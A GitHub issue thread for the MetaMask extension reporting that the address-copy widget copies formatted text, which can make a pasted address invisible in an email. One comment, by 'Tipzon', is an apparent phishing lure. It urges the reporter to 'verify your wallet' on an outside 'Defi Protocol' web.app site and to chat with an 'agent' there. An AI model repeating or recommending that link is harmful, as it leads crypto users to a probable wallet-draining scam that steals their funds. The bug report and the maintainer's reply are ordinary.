### ISSUE TITLE
[Bug]: Clipboard widget copies formatted text

### ISSUE THREAD

**Issue by NiloCK** [MetaMask/metamask-extension#21169]
### Describe the bug

![image](https://github.com/MetaMask/metamask-extension/assets/10780590/5d9142c7-9b01-4161-9492-04bc7d655723)

The widget above allows for a quick and convenient copy of the full address. Currently, the copied text includes some formatting metadata (think: font, colour, etc). **Probably**, it's better to copy the text as "naked" as possible.

### Expected behavior

Recently, I copied an address to paste into an email. When pasting, the address didn't "appear" as part of my email body. The issue was that the pasted text had the same colour as my client's default background, but it took me a couple of failed retries to figure this out.

Resolving for me involved "paste without formatting", executed on some (most?) OSs with `ctrl`+`shift`+`v`.

Less technical users might not be well prepared to either:
- recognize the failure mode
- resolve with special pasting magic

### Steps to reproduce

1. Open metamask
2. Click the address to copy
3. try pasting in different environments, and observe differences between default paste (ctrl-v) and paste-without-formatting (ctrl-shift-v (maybe - OS dependent))

### Version

11.0.0

### Build type

None

### Browser

Firefox

### Operating system

Linux

### Additional context

This quirk was observed with the address copying widget. I have not checked whether the same issue presents elsewhere with other parts of metamask that write to clipboard.

**Comment by Tipzon** [comment]
Hi @NiloCK 
Visit the official Defi Protocol page to verify your wallet under Resolve to complete your request for you eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by anaamolnar** [comment]
Thanks for reporting, @NiloCK! I will pass this on to the team.
